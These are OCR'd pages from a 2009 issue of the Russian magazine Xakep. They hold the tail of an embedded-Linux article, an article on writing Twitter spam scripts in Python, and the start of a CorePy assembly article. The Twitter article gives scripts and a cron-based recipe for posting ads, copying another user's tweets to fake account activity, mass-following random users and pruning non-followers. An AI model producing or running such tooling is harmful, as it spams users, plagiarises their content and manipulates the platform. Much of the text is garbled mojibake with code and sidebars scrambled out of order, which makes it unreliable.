
должно. Теперь по поводу железа. Во-первых, не забывай про мощный 

отладочный интерфейс JTAG, который есть на борту у каждого уважающего 

себя контроллера. С ним заливка и отладка софта становятся 

вообще сказкой. JTAG-отладчик для LPT-порта можно собрать самостоятельно 

(смотри, к примеру, схему — www.diygadget.com/store/buildingsimple-jtag-cable/info_12.html) 

или купить готовый. Софта под интерфейс 

JTSG завались, и там уже выбирай под нужную тебе задачу. 

Ядро Linux при загрузке очень любит плеваться сообщениями на 

отладочный интерфейс (DBGU) контроллера. Естественно, нам первое 

время надо будет общаться с Linux’ом и искать ошибки напрямую. Для 

этого загрузчиком заранее конфигурируется DBGU-интерфейс, который 

XÀÊÅÐ 04 /124/ 09 

представляет собой обыкновенный RS-232 порт, к которому присоединяются 

с помощью кабеля для COM-порта (надеюсь, COM-разъем у тебя на 

отладочной плате распаян). 

Взяв какой-нибудь эмулятор терминала, типа cu или ckermit, и подклю- 

Âèðòóàëüíàÿ 

ïàìÿòü 

MMU ñîçäàåò àáñòðàêòíûé ñëîé ìåæäó ðåàëüíîé, «æåëåçíîé» 

ïàìÿòüþ è òàê íàçûâàåìîé âèðòóàëüíîé àäðåñàöèåé, ê êîòîðîìó, 

â èòîãå, è îáðàùàåòñÿ ïðîöåññîðíîå ÿäðî. Ïðèìåð: çàãðóç÷èê 

ìèêðîêîíòðîëëåðà AT91SAM9 ìîæåò æèòü â äâóõ ðàçíûõ ìåñòàõ 

— â ìèêðîñõåìàõ Dataflash è NANDFlash. Ïðè âêëþ÷åíèè ïèòàíèÿ 

âñòðîåííûé SAM-BA Boot çàïóñêàåòñÿ èç âíóòðåííåé ROM êîíòðîëëåðà. 

Â ýòîò ìîìåíò âíóòðåííÿÿ read-only ïàìÿòü «íàõîäèòñÿ» 

ïî àäðåñó 0x00, ïîýòîìó ÿäðî ÷åñòíî íà÷èíàåò âûïîëíÿòü êîä, 

çàïèñàííûé òàì. Çàìåòü, ÿäðî óíèâåðñàëüíî è íè÷åãî íå çíàåò 

ïðî îêðóæàþùóþ åãî ïåðèôåðèþ. Îíî òóïî è íàèâíî íà÷èíàåò 

âûïîëíÿòü ïðîãðàììó, íàõîäÿùóþñÿ ïî íóëåâîìó àäðåñó. SAM-BA 

— ïðèìèòèâíûé çàãðóç÷èê, îí ìîæåò òîëüêî îïðîñèòü ïî î÷åðåäè 

Dataflash è NANDFlash è ñêîïèðîâàòü ïåðâûå 4 Êá íàéäåííîãî 

êîäà âî âíóòðåííþþ îïåðàòèâíóþ ïàìÿòü SRAM ìèêðîêîíòðîëëåðà. 

Ïîñëå êîïèðîâàíèÿ SAM-BA èñïîëíÿåò îñîáóþ ïðîöåññîðíóþ 

îïåðàöèþ, è àäðåñ 0x00 óæå óêàçûâàåò íà âíóòðåííþþ 

ñòàòè÷åñêóþ ïàìÿòü. Äàëåå 4-êèëîáàéòíûé çàãðóç÷èê ìîæåò 

ñêîïèðîâàòü îñíîâíîé êîä èç îñòàâøåãîñÿ îáúåìà Flash-êàðòû â 

îïåðàòèâíóþ ïàìÿòü SDRAM, ïîñëå ÷åãî íóëåâîé àäðåñ âèðòóàëüíîé 

ïàìÿòè áóäåò óæå óêàçûâàòü â íà÷àëî îïåðàòèâêè, è íà÷íåòñÿ 

íîðìàëüíàÿ çàãðóçêà. Òàêîå âîò ïðûãàíèå íóëåâîãî àäðåñà, ïðî 

êîòîðîå íè÷åãî íå îáÿçàíî çíàòü ÿäðî ARM. Â ïðîöåññå ðàáîòû òîò 

æå êîíòðîëëåð MMU ïðîåöèðóåò âñå ìèêðîñõåìû ïàìÿòè, âèñÿùèå 

íà øèíå External Bus Interface, â áëîêè 256 Ìá êàæäûé, è ìû óæå ïî÷òè 

ìîæåì íå çàäóìûâàòüñÿ î ðåàëüíîì ìåñòîíàõîæäåíèè íàøèõ äàííûõ. 

Âñå «ïðîçðà÷íî» è â îäíîì ïðîñòðàíñòâå. Â âåðõíþþ îáëàñòü ïàìÿòè 

(4 Ãá) îáû÷íî ìàïÿòñÿ àäðåñà ðåãèñòðîâ äëÿ óïðàâëåíèÿ ïåðèôåðèåé. 

Ýòî — ñòàíäàðòíàÿ ôèøêà âñåõ ìèêðîêîíòðîëëåðîâ. 

085

unixoid 

ЗАГРУЗЧИКИ 

Это самая сложная и ответственная часть загрузки Linux. Чемпионом по 

зоопарку поддерживаемых архитектур и размеру сообщества является 

универсальный загрузчик U-Boot (www.denx.de/wiki/U-Boot). На страницах 

журнала о нем не раз упоминалось. Для первых опытов советую 

именно его, так как тут есть, в том числе, драйвера на огромный список 

внешней периферии. Если утрировать, заточка U-Boot под конкретное 

устройство часто сводится к чтению маркировок окружающих контроллер 

микросхем. Для совсем ленивых этот загрузчик уже допилен 

под процессоры Atmel AT91SAM и AVR32, смотри сайты linux4sam.org 

и avrfreaks.net. На втором месте — загрузчик RedBoot, с не меньшими 

возможностями, но с меньшим комьюнити. Каюсь, я про него доселе 

сам ничего не знал, но если те же ЕмДебиановцы советуют, то он точно 

чего-то стоит :). Помимо универсальных загрузчиков, существуют еще 

заточенные под отдельные контроллеры, пишущиеся производителями 

и включающиеся ими в так называемые Software Packages. Просто 

поищи на сайте производителя — нечто подобное для облегчения труда 

программиста там всегда выкладывают. Например, для Atmel AT91SAM9 

уже существует быстрый и компактный загрузчик AT91 Bootstrap. Он 

понимает файловые системы JFFS2, FAT, подцепляет флешки и умеет 

загружать Linux. Ну а большего нам и не надо. 

Область применения Soekris net5501: маршрутизаторы, VPN-концентраторы 

и точки доступа 

чившись к устройству через COM-порт, ты сможешь низкоуровнево наблюдать 

за процессом загрузки и отсылать команды загрузчику и ядру. В 

общем, это твой первый терминал, когда Linux на устройстве еще ничего 

не знает ни о какой периферии ввода-вывода. 

Не все контроллеры умеют без загрузчика шиться по USB, многим для 

этого требуются спецпротоколы, скажем, C2 или ActiveSerial. Про твое 

устройство, как и про способ его загрузки, я ничего не знаю, поэтому 

— марш на сайт производителя изучать способы прошивки своего 

отдельно взятого МК. Возможно, тебе придется докупить или допаять 

какой-нибудь простенький шнурок. 

ЧТО, КУДА И КАК ЗАЛИВАТЬ 

Загрузчик, запакованное ядро и ФС с софтом надо где-то хранить. Чаще 

всего, загрузчик заливают в набортную флеш-память микроконтроллера, 

а все остальное лежит в распаянной рядом NAND-памяти. 

Собранный софт (в нашем случае — это ядро Linux и образ ФС) нужно 

залить в энергонезависимую память твоей платы. Способ целиком и 

полностью зависит от архитектуры и периферии устройства, так что 

все действия смотри в документации к своему контроллеру. Например, 

контроллер Atmel AT91SAM9260, на котором я отлаживаю свой Linux, 

никакой внутренней флеш-памяти не имеет, и прошивку надо заливать 

в запаянные рядом микросхемы Data или NAND-Flash памяти. Это было 

бы муторно, но к счастью, мой контроллер, не находя нигде подходящей 

программы, самостоятельно переключается в так называемый режим 

SAM-BA Boot, и, будучи воткнутым по USB в компьютер, определяется 

как usbserial-устройство. После чего, через специальный софт, написанный 

Atmel’овцами, я могу напрямую заливать нужные образы по адресам 

в память устройства сквозь микроконтроллер. 

Ну а если ты не поленился найти или запаять JTAG-интерфейс, то с 

легкостью сможешь не только заливать в контроллер софт, но и трассировать 

его. 

086 

ДИСТРИБУТИВЫ 

Вместо того чтобы вручную конфигурировать ядро, писать драйвера, 

долгие часы отлаживать процесс загрузки Linux на МК и по-всякому 

извращаться, я советую менее универсальный, но более действенный 

способ установки на твое устройство готового «дистрибутива», где большинство 

проблем, описанных в этой статье, уже решены. 

Полагаю, абсолютное чемпионство по количеству разных архитектур и 

пакетов принадлежит проекту Дебиан и его подразделу EmDebian (www. 

emdebian.org). Последний отличается от оригинального Debian тем, что 

у него меньший размер — там просто повыкидывали ненужные файлы, 

типа документации. Хелпов на сайте проекта завались, есть подробные 

HowTo, много вспомогательных утилит и прекомпилированные пакеты. 

Выполняй по пунктам процесс установки — и будет тебе счастье. У 

проекта нет собственного загрузчика, поэтому мантейнеры советуют 

использовать сторонние, типа U-boot или RedBoot (www.emdebian.org/ 

tools/bootloader.html). 

Вообще, если к твоему устройству можно подключить винчестер или мегафлешку, 

то можешь не заморачиваться и ставить «большой» дистрибутив 

Debian. Всяко, там пакетов больше, да и система «взрослая». 

А если ты приверженец Генту? Пожалуйста, к твоим услугам Embedded 

Gentoo (www.gentoo.org/proj/en/base/embedded)! Хелп хороший, примеров 

много, а в загрузчики нам сватают все тот же U-Boot. 

Более продвинутые линуксоиды, которым знакомы слова Linux from 

Scratch, могут попробовать метадистрибутив OpenEmbedded (www. 

openembedded.org). По сути, это набор скриптов, build-утилита BitBake и 

набор метаданных, призванные облегчить сборку как ядра Линукс, так и 

любого софта под сторонние дистрибутивы. Никаких репозиториев, как 

в бинарных дистрибах, у него нет, – зато есть инструменты для легкого 

создания пакетов под IPK, RPM, DEB или tar.gz форматы. 

Кроме «универсальных» дистрибутивов, которые можно поставить на 

все, что угодно, в природе существуют специализированные, заточенные 

под определенный тип устройств. Например, проект OpenWrt 

(openwrt.org), предназначенный для установки исключительно на точки 

доступа. Народ помаленьку портирует туда софт, который ты запросто 

сможешь скачать прямо на устройство с помощью программы opkg, 

родственника дебиановского dpkg/apt. Прописываешь в местный 

аналог sources.list репозиторий под твою архитектуру и наслаждаешься 

круглосуточным файл-сервером и торрент-клиентом на стенке. 

Под мобильники (они относятся к встраиваемым устройствам!) сейчас 

тоже создаются варианты Линукса. Это — MontaVista (www.mvista. 

com) и нашумевший недавно OpenMoko c платформой Neo FreeRunner 

(openmoko.org). Направление новое, перспективное, поэтому дистрибутивами 

в этом секторе занимаются не столько энтузиасты, сколько 

вполне себе корпорации. Google с Nokia также поспешили выпустить 

свои продукты, и мы получили бегающие под Linux’ом Android’ы и N810. 

Не следует забывать и про самые маленькие и «глупые» устройства с примитивными 

МК без MMU, например, ARM7. Для них был проработан дистрибутив 

ucLinux (uclinux.org/ports) с отвязанными от ядра функциями управления 

памятью. Несмотря на отсутствие какой бы то ни было защиты и безопасности 

(одна программа может запросто повредить память другой), ucLinux — настоящая 

и полноценная система с поддержкой многозадачности. 

ЗАКЛЮЧЕНИЕ 

В пределах одной статьи невозможно охватить весь процесс установки 

и настройки Линукса на встраиваемые устройства, слишком уж велик 

зоопарк архитектур и спектр конфигурации. Но если теоретический материал 

тебя заинтересует настолько, что ты пойдешь изучать вопрос по 

сайтам и форумам, то с практикой, после подготовки, проблем тем более 

не возникнет! z 

XÀÊÅÐ 04 /124/ 09

Реклама

++++ 

>> coding 

++++ 

++++ 

++++ 

++++ 

РОМАН «SPIRIT» ХОМЕНКО 

/ HTTP://TUTAMC.COM / 

++++ 

++++ 

++++ 

++++ 

++++ 

++++ 

Атака 

на МИСТЕРА ТВИТТЕРА 

Скрипты для спама Twitter на Python’e 

Недавно мне попался на глаза пост на хабре с располагающим 

названием «Коммерческий инструмент для спама в твиттере — 

TweetTornado». Я заглянул на официальный сайт этого чуда-юда 

(tweettornado.com) и чуть со стула не упал. Оказалось, что он стоит 

целых 100 долларов! 

++++ 

++++ 

++++ 

++ ++ 

++++ 

++++ 

++++ 

++++ 

«За любовь не платят», — процитировал я исконный девиз ex-USSR 

хакеров и тут же взялся за написание соответствующей программы. Утаивать 

тонкости данного процесса от читателей z я не планирую, поэтому 

из статьи ты узнаешь, как злые кодеры создают рабочий инструмент для 

спама в твиттере. Он будет представлять собой 4 скрипта: 

• для отсылки одиночного сообщения; 

• бота для имитации активности аккаунта; 

• для добавления друзей; 

• для удаления «не друзей». 

Ну что же, приступим. 

TWITTER 

Прежде всего — немного теории для олдскульных зомби, которые до 

этого момента ничего не знали о микроблоггинге. Если ты не из их числа 

— перескакивай к следующему разделу. Итак, Twitter (twitter.com) — это 

микроблогинговый сервис, максимальный размер сообщения в рамках 

которого не должен превышать 140 символов. Суть сервиса проста: у 

тебя есть лента сообщений, в которой отображаются записи, сделанные 

тобою и твоими друзьями (или на языке твиттера — following). Все люди, 

следящие за блогом (followers), будут получать твои сообщения. 

Твиттер родился в 2006 году, но популярность стал набирать где-то в 

начале 2007. Сейчас в нем около 5 миллионов пользователей. С одной 

стороны, вроде бы и маловато (по сравнению с социальными сетями), но, 

учитывая неплохую положительную динамику в плане роста и тот факт, что 

одно отправленное сообщение тут же будет приходить всем зафолловленным 

пользователям — «реклама» в твиттере будет иметь очень радужные 

088 

перспективы. Сразу оговорюсь, мы не будем работать с русскоговорящей 

аудиторией твиттера (в связи с тем, что ее представляют, в основном, 

наши с тобой братья — компьютерные специалисты), предпочтя ей злых 

буржуинов — в Штатах твиттер уже выбрался в массы, к «домохозяйкам». 

ПОДГОТОВКА РАБОЧЕГО МЕСТА 

Скрипты мы будем писать на Python — в Linux он есть в большинстве 

дистрибутивов по умолчанию, а для работы с ним в Windows нужно установить 

интерпретатор версии 2.5 и библиотеку pyCurl. Все это хозяйство 

ты можешь найти на нашем диске. Для экспериментов со скриптами 

рекомендую заранее зарегистрировать новый аккаунт на твиттере 

вручную. Этот этап автоматизировать мы не будем в связи с наличием 

хорошей капчи, но много аккаунтов и не нужно, для спама хватит одного. 

ТВИТТЕР API 

Twitter всегда был приветлив к рекламным агентам. Его авторы создали 

очень простое API, позволяющее одним POST- или GET-запросом производить 

любые действия над твиттером. Все запросы отлично описаны в 

документации (apiwiki.twitter.com). Для каждого действия приводится: 

• URL запроса; 

• формат ответа, который вернет сервер; 

• метод запроса (POST или GET); 

• параметры и их описание; 

• пример запроса. 

Некоторые примеры, взятые из документации, ты сможешь увидеть 

на врезках. Кстати, когда будешь производить действия, требующие 

XÀÊÅÐ 04 /124/ 09

coding 

авторизации, помни, что в запросе нужно посылать логин и пароль с 

помощью HTTP Basic Authentication. 

При выборе формата результата мы всегда будем выбирать xml — мне он 

больше нравится, да и обрабатывать его очень просто. 

Теперь немного отвлечемся от API твиттера и научимся посылать запросы 

с помощью Python. 

PYTHON И CURL 

В случае возникновения необходимости выполнения HTTP-запросов я 

всегда выбираю мощный, универсальный инструмент, который работает 

во многих языках программирования — cURL. 

Для его использования подключим библиотеку pycURL: 

import pycurl 

Чтобы принять данные после запроса и сохранить их, библиотека 

pycURL требует указать функцию, которая будет принимать данные. 

Можно, конечно, и самим написать ее, но лучше воспользуемся модулем 

для работы со строками StringIO. 

В объекте StringIO есть метод write, идеально подходящий для 

этой цели. Подключим модуль и объявим объект такими строчками: 

import StringIO 

data = StringIO.StringIO() 

Теперь можно объявить объект pycURL и настроить параметры, например, 

для осуществления запроса главной странички xakep.ru. Полученный 

результат выведем на экран: 

ПОСТИНГ СООБЩЕНИЙ 

Вернемся к горячо любимому микроблоггингу и попробуем применить 

наши знания API твиттера путем создания первого скрипта, который 

будет отсылать сообщения: 

import pycurl, StringIO 


curl = pycurl.Curl() 

curl.setopt(pycurl.URL, 

'http://twitter.com/statuses/update.xml') 

curl.setopt(pycurl.WRITEFUNCTION, data.write) 

curl.setopt(pycurl.USERPWD,'spiritua:password') 

curl.setopt(pycurl.POSTFIELDS,'status=TEXT') 

curl.setopt(pycurl.POST,1) 

curl.perform() 

curl.close() 

print data.getvalue() 

В нем, как видно, ничего сложного. Главное — не забудь 

«spiritua:password» заменить на свой логин и пароль, а вместо «TEXT», 

соответственно, написать нужное сообщение. 

Чтобы сделать использование удобнее и каждый раз при постинге 

сообщений не изменять в исходнике текст, заюзаем библиотеку sys для 

получения аргументов из командной строки: 

import sys 

– и изменим наш «TEXT» на «sys.argv[1]». 

Вызывать скрипт мы теперь будем так: 


#óñòàíàâëèâàåì ïàðàìåòðû çàïðîñà 

curl.setopt(pycurl.URL, 'xakep.ru') 


#èñïîëíèì çàïðîñ 


#îñâîáîäèì ïàìÿòü 

curl.close() 

#ïîëó÷èì ðåçóëüòàò è âûâåäåì íà ýêðàí 

print data.getvalue() 

Далее, манипулируя методом setopt, мы по желанию сможем изменять 

наши запросы. Например, если добавить нижеуказанный код, то запрос 

будет осуществлен через socks с IP 192.168.1.1, размещенным на 2222 

порту. 

curl.setopt(pycurl.PROXYTYPE, 

pycurl.PROXYTYPE_SOCKS5) 

curl.setopt(pycurl.HTTPPROXYTUNNEL,1) 

curl.setopt(pycurl.PROXY, '192.168.1.1:2222') 

XÀÊÅÐ 04 /124/ 09 

sender.py "I love XAKEP" 

Обрати внимание, кавычки обязательны, так как потом скрипт берет 

только первый аргумент. Без них будет отослано лишь одно слово. 

ИМИТАЦИЯ АКТИВНОСТИ 

Чтобы пользователи добавили тебя в друзья и долго не удаляли, нужно 

имитировать активность, вести себя как обычный твиттерянин, лишь 

иногда публикуя рекламные посты. А не слишком ли тяжело будет придумывать 

сообщения? Может, проще подсмотреть их у соседа? Сделаем 

хитро — выберем проявляющего сетевую активность человека и 

утащим его посты к себе. После написания подобного скриптика для 

автопостинга, его можно поставить на cron (программа для запуска 

заданий по расписанию) с ежечасным вызовом. Для реализации этой 

задачи научимся читать посты юзеров. В твиттер API указано, что нужно 

использовать GET-запрос следующего вида — http://twitter.com/ 

statuses/user_timeline/spiritua.xml. Здесь вместо ‘spiritua’ мы вставим 

имя выбранного донора сообщений. По расширению xml становится 

понятно, в каком формате придет результат :). Для дальнейшего парсинга 

xml можно использовать библиотеки, но в нашем случае от этого 

089

++++ 

>> coding 

++++ 

++++ 

++++ 

Ñêðèïò 

èìèòàöèè 

àêòèâíîñòè 

++++ 

import re, sys, pycurl, StringIO 

#èíèöèàëèçàöèÿ îáüåêòîâ äëÿ ïîñûëêè çàïðîñîâ 



++++ 

++++ 

++++ 

++++ 

++++ 

++++ 

++++ 

++++ 

++++ 

++ ++ 

++++ 

++++ 

++++ 

warning 

Реклама полностью 

законна! Но — незаконно 

копирование 

в свой твит чужого 

контента. Этого мы 

тебе делать не советуем. 

links 

• Обо всех возможностях 

cURL читай 

на официальном 

сайте http://pycurl. 

sourceforge.net. 

• http://apiwiki.twitter. 

com — документация 

API твиттера. 

• www.python.org — 

официальный сайт 

Python. 

• http://python.su/ 

forum — полезный 

питоновский форум. 

dvd 

На диске, кроме 

исходников и необходимых 

установочных 

файлов, ты найдешь 

также видео 

автора об установке 

и настройке среды 

программирования. 

усложнения помогут избавиться регулярные выражения. 

Если мы посмотрим на структуру xml-ответа, то увидим, 

что сообщения всегда находятся между тегами . 

Исходя из этого, заюзаем следующую регулярку: 

(.*). 

Для использования регулярных выражений в Python 

подключим модуль с названием re и используем его метод 

findall, который возвратит массив. Получим следующее: 

import re 

rez = re.findall("(.*)",data) 

Алгоритм скрипта активности будет такой: 

• берем у донора самое последнее сообщение; 

• проверяем, есть ли это сообщение среди наших, и, если 

нет, — публикуем. 

Думаю, теперь ты и сам сможешь его написать… или подглядеть 

на врезке и нашем диске. 

Осталось разобрать еще два скрипта, которые связаны с 

ростом рекламной сети, — то есть, расширением списка 

друзей. 

ТВИТТЕРЯНИН, ГДЕ ТЫ? 

Для поиска друзей я знаю три способа, которые нужно 

использовать в зависимости от желаемого результата: 

Äîáàâëåíèå 

â äðóçüÿ 

Äîáàâèòü â äðóçüÿ ïîëüçîâàòåëÿ, çíàÿ ID èëè ëîãèí 

URL: http://twitter.com/friendships/create/ 

id.format 

Ôîðìàòû ðåçóëüòàòîâ (format): xml, json 

Ìåòîä çàïðîñà: POST 

Ïàðàìåòðû: id — îáÿçàòåëüíîé ïàðàìåòð, ñîäåðæèò 

ID èëè ëîãèí ïîëüçîâàòåëÿ, êîòîðîãî äîáàâëÿåì â 

äðóçüÿ 

Ïðèìåð çàïðîñà: http://twitter.com/friendships/ 

create/bob.xml 

#âìåñòî donor íóæíî íàïèñàòü èìÿ ïîëüçîâàòåëÿ, 

êîòîðîãî íóæíî êîïèðîâàòü 


'twitter.com/statuses/user_timeline/ 

donor.xml') 

curl.setopt(pycurl.WRITEFUNCTION, 

data.write) 

#çàïóñê çàïðîñà íà ïîëó÷åíèÿ ñîîáùåíèé 


#ïðèìåíåíèå ðåãóëÿðêè äëÿ âûäåëåíèÿ èç òåêñòà 

ëèøü ñîîáùåíèé è ñîõðàíåíèÿ èõ â ìàcñèâ 

donor 

donor = re.findall("(.*)", 

data.getvalue()) 

#îñâîáîæäàåì áóôåð äëÿ ñëåäóþùåãî çàïðîñà 

data.truncate(0) 

#âìåñòî user ïèøåì ñâîå èìÿ òâèòòåðà 


'twitter.com/statuses/user_timeline/user. 

xml') 


#ïîèñê âñåõ ñîîáùåíèé è ñîõðàíåíèå èõ â ìàcñèâ 

my 

my = re.findall("(.*)", 

data.getvalue()) 

#åñëè ïîñëåäíåãî ñîîáùåíèÿ äîíîðà íåò 

if donor[0] not in my: 

#íàñòðàèâàåì çàïðîñ äëÿ îòñûëêè ñîîáùåíèÿ 


'twitter.com/statuses/update.xml') 

#íå çàáûâàåì ïîìåíÿòü èìÿ è ïàðîëü 

curl.setopt(pycurl.USERPWD, 'name:passwd') 

curl.setopt(pycurl.POSTFIELDS, 

'status=' + donor[0]) 



print 'one update posted' 

else: 

print ‘no new updates’ 

#íå çàáûâàåì îñâîáîäèòü ïàìÿòü 

curl.close() 

1) Поиск по имени. 

2) Поиск по списку друзей. 

3) Случайный выбор. 

Поиск по имени почти не интересен, и я не знаю, где он был 

бы в нашей деятельности полезен. Поиск по списку друзей 

— наиболее продвинут и совершенно незаменим в случае, 

если нужно искать людей определенного круга. Например, 

++++ 

090 

XÀÊÅÐ 04 /124/ 09

coding 

Питон всегда с улыбкой 

мы хотим продавать маечки с нарисованной Бритни Спирс. Ясное дело, 

нужно найти ее твиттер и достать список тех, кто его читает. Разумеется, 

на первых порах такой основательный таргетинг мы рассматривать 

не будем, поэтому в рамках статьи рассмотрим третий вариант — случайный 

выбор. Для этого лезем в API и видим, что, послав Get-запрос 

на URL http://twitter.com/statuses/public_timeline.xml, мы получим 20 

последних сообщений вместе с данными об авторах. Кстати, третий вариант 

удобен еще и тем, что, используя его, мы получим лишь активных 

пользователей. 

Имя в ответе от твиттера будет находиться между тегами , 

поэтому для последующего парсинга результата подойдет вот эта регулярка: 

(.*). 

Получив список из 20 пользователей, нужно попросить их добавить нас 

в друзья. Благо, существует такая наука психология, и она говорит, что, 

если добавить пользователя, то он с большой вероятностью добавит нас 

и будет читать наши сообщения :). 

Опять обратимся к API, в котором указано, что для добавления в друзья необходимо 

послать Post-запрос на URL http://twitter.com/friendships/create/ 

spirit.xml, где вместо spirit придется вставить имя нужного аккаунта. 

Переводя все это на Python, получим основные строчки для добавления 

в друзья (остальное можно подсмотреть на диске): 


'http://twitter.com/friendships/create/' + name + 

'.xml') 

Îáíîâëåíèå 

ñòàòóñà (îòñûëêà 

ñîîáùåíèÿ) 

ïîëüçîâàòåëÿ 

URL: http://twitter.com/statuses/update.format 

Ôîðìàòû ðåçóëüòàòîâ (format): xml, json 

Ìåòîä çàïðîñà: POST 

Ïàðàìåòðû: status — îáÿçàòåëüíûé ïàðàìåòð, êîòîðûé ñîäåðæèò 

òåêñò íîâîãî ñòàòóñà. Èñïîëüçóéòå URL-êîäèðîâàíèå ïðè íåîáõîäèìîñòè. 

Äëèíà òåêñòà äîëæíà áûòü íå áîëåå 140 ñèìâîëîâ. 

XÀÊÅÐ 04 /124/ 09 

Наши стрелы в твиттере 

curl.setopt(pycurl.USERPWD,'spiritua:passwd') 


Теперь берем и соединяем «поиск 20 случайных юзеров» и «добавление в друзья». 

В результате получаем супер скрипт, который, опять же, ставим на Cron с 

определенным интервалом, и наблюдаем, как бодро и молодцевато (так говорят 

у нас в милиции) растет рекламная сеть (áëèí, íå çðÿ ìíå ïîêàçàëàñü 

ïîäîçðèòåëüíîé åãî ôîòîãðàôèÿ â ïîãîíàõ, — Ïðèì. Ëîçîâñêîãî). 

«РЕДИСКА» — ПЛОХОЙ ЧЕЛОВЕК 

И было бы все хорошо, если бы не существовали люди, нежелающие 

ответным жестом добавлять нас с тобой в виртуальные товарищи. Эти 

люди портят статистику, поэтому я советую периодически от них избавляться. 

Для этого нужно получить список людей, которых ты добавил 

друзья, и список тех, кто добавил тебя. Сравниваем списки и кикаем 

лишних… Для получения списков нужно послать запросы на URL: 

• http://twitter.com/statuses/friends.xml 

• http://twitter.com/statuses/followers.xml 

В итоге, получим следующий код: 

#íàñòðîèì cURL íà ïîëó÷åíèå ñïèñêà äðóçåé 


'http://twitter.com/statuses/friends.xml') 

curl.setopt(pycurl.USERPWD,’spiritua:passwd') 


091

++++ 

>> coding 

++++ 

++++ 

++++ 

++++ 

++++ 

++++ 

Удобное программирование в Eclipse 

++++ 

++++ 

friends = re.findall("(.*)", 

friends) 

followers = re.findall("(.*)", 

followers) 

++++ 

++++ 

Питон всегда с улыбкой 

А теперь можно приступать к удалению, посылая запросы на URL http:// 

twitter.com/friendships/destroy/spirit.xml. В результате должен получиться 

примерно следующий код (полный исходник рекомендуется курить с 

нашего диска): 

#ïîäêëþ÷èì áèáëèîòåêó time äëÿ êîìàíäû sleep 

import time 

++++ 

curl.setopt(pycurl.POST, 1) 

#öèêë ïî âñåìó ñïèñêó äðóçåé 

for friend in friends: 

#ïðîâåðêà — ÷èòàåò ëè äðóã íàñ 

++++ 

if friend not in followers: 

#åñëè íå ÷èòàåò — òî äëÿ íàñ îí íå äðóã 


'http://twitter.com/friendships/destroy/’+ 

++++ 

Твиттер часто читают через 

специальные программы 

Логотип TweetTornado 

friend+'.xml') 

curl.perform() #æäåì 2 ñåêóíäû 

time.sleep(2) 

++ ++ 

++++ 

++++ 

++++ 

#çàïóñòèì çàïðîñ 


#ñîõðàíèì ðåçóëüòàòû â ïåðåìåííóþ friends 

friends = data.getvalue() 

#î÷èñòèì áóôåð äëÿ ñëåäóþùåãî çàïðîñà 

data.truncate(0) 

#ïîëó÷èì ñïèñîê ëþäåé, êîòîðûå ÷èòàþò íàñ 


'http://twitter.com/statuses/followers.xml') 


followers = data.getvalue() 

В переменных friends, followers будет храниться результат в формате 

xml, полученный от твиттера. Обработав их уже знакомой нам регуляркой 

на поиск тегов , получим массивы: 

В ПУТЬ! 

Мы рассмотрели основные тезисы создания рекламной сети в твиттере. 

Это — базовый набор, которого хватит на первое время. Теперь сам сможешь 

их расширять, исходя из своих потребностей, например, добавить 

скрипту возможность работать с несколькими аккаунтами или использовать 

прямые текстовые сообщения, таргетинг и другие занимательные 

вещи. Предлагаю ознакомиться с примером из частной практики одного 

злого хакера. Итак, после регистрации аккаунта он устанавливает фотографию 

и заполняет все поля в профиле. Далее настраивает крон на запуск 

имитации активности где-то с периодичностью в 3 часа. Ждет неделю 

и — добавляет в крон запись, позволяющую раз в 3 дня запускать скрипт 

сначала на очистку от «редисок», а затем — на приглашение 100 новых 

юзеров. Об аккаунте он забывает до тех пор, пока у него не соберется 

где-то 2000 фаловеров. На этом он останавливает скрипты роста, оставляя 

лишь имитацию активности. Приблизительно раз в неделю размещается 

рекламное объявление. z 

++++ 

092 

XÀÊÅÐ 04 /124/ 09

++++ 

>> coding 

++++ 

++++ 

++++ 

++++ 

АЛЕКСЕЙ ЧЕРКЕС 

/ ALEKSEY.CHERKES@GMAIL.COM / 

++++ 

++++ 

++++ 

++++ 

++++ 

ПИТОН для матерых 

хардкорщиков 

Куем ассемблерные вставки в Python с помощью кошерного CorePy 

Я постоянно использую в работе open source программы и не перестаю 

удивляться, какие необычные проекты порой зарождаются в 

этой свободной среде. На мой взгляд, коммерческие приложения никогда 

не будут отличаться таким полетом мысли, как в среде открытого 

ПО. 

++++ 

++++ 

++++ 

++++ 

++ ++ 

++++ 

++++ 

++++ 

++++ 

Осваивая подобные продукты, глубже понимаешь сложные концепции 

программирования, детальнее изучаешь интересные технологии. В этот 

раз речь пойдет о вещах немного непривычных. Я расскажу о скрещивании 

двух языков программирования: ассемблера и Python’a. Такой тандем 

нечасто встречается на практике, ведь эти два языка решают абсолютно 

разные задачи: ассемблер максимально приближен к аппаратуре, 

предоставляет программисту над ней полный контроль, но программирование 

на нем — долгое, иногда нудное и кропотливое занятие, требующее 

нечеловеческой внимательности и терпения. Python, наоборот, проектировался 

так, чтобы максимально облегчить труд программиста. Это очень 

комфортный язык, который доступен каждому. На первый взгляд, смесь 

двух подходов выглядит едва ли возможной. В Python даже нет понятия 

указателя, — тут вообще не идет речи о прямой работе с памятью, ведь всю 

грязную работу выполняет трудолюбивый garbage collector! А такие вещи, 

как динамическая типизация и функции, являющиеся объектами первого 

класса и делающие интеграцию с ассемблером, казалось бы, неразрешимой 

на практике задачей? Однако в этой статье я рассмотрю технологию 

CorePy, которая делает подобную интеграцию возможной. 

ОБЩИЙ ОБЗОР 

CorePy — это модуль расширения для Python, частично написанный на С. 

Он позволяет программисту писать и исполнять ассемблерные программы, 

работая исключительно с интерпретатором Python. Это дает возможность 

проводить машинно-зависимую оптимизацию Python-программ, которая 

обычно невозможна даже в случае использования таких языков, как C. К примеру, 

ты можешь напрямую использовать технологии наподобие MMX и SSE. 

CorePy поддерживает процессоры x86, x86_64 (с поддержкой SSE), 

PowerPC (PPC32 и PPC64), VMX/AltiVec и Cell SPU. Он может работать в 

операционных системах linux и OS X. Microsoft Windows в списке почемуто 

не значится ;). 

094 

ВЕСЬ COREPY МОЖНО РАЗБИТЬ НА ТРИ ОСНОВНЫХ СЛОЯ: 

1) Instruction Set Architectures (ISAs). Это библиотеки объектов, которые 

представляют собой инструкции из разных наборов команд. Один 

физический процессор может поддерживать несколько наборов команд 

(например, x86 и SSE). 

2) InstructionStreams или потоки команд. Это контейнеры для объектов 

из пункта 1. Отвечают за хранение последовательности инструкций и 

за взаимодействие с операционной системой для их исполнения. 

3) Processors. Выполняют потоки команд и отвечают за передачу и 

возврат аргументов. Возможно синхронное и асинхронное выполнение 

потоков. 

В начале работы программисту необходимо создать один из объектов 

InstructionSream. Затем пустой поток команд наполняется другими 

объектами, каждый из которых однозначно идентифицирует машинную 

инструкцию и ее параметры. На данном этапе никакого кода реально не 

создается! Мы просто описываем нужную нам программу, наполняя коллекцию 

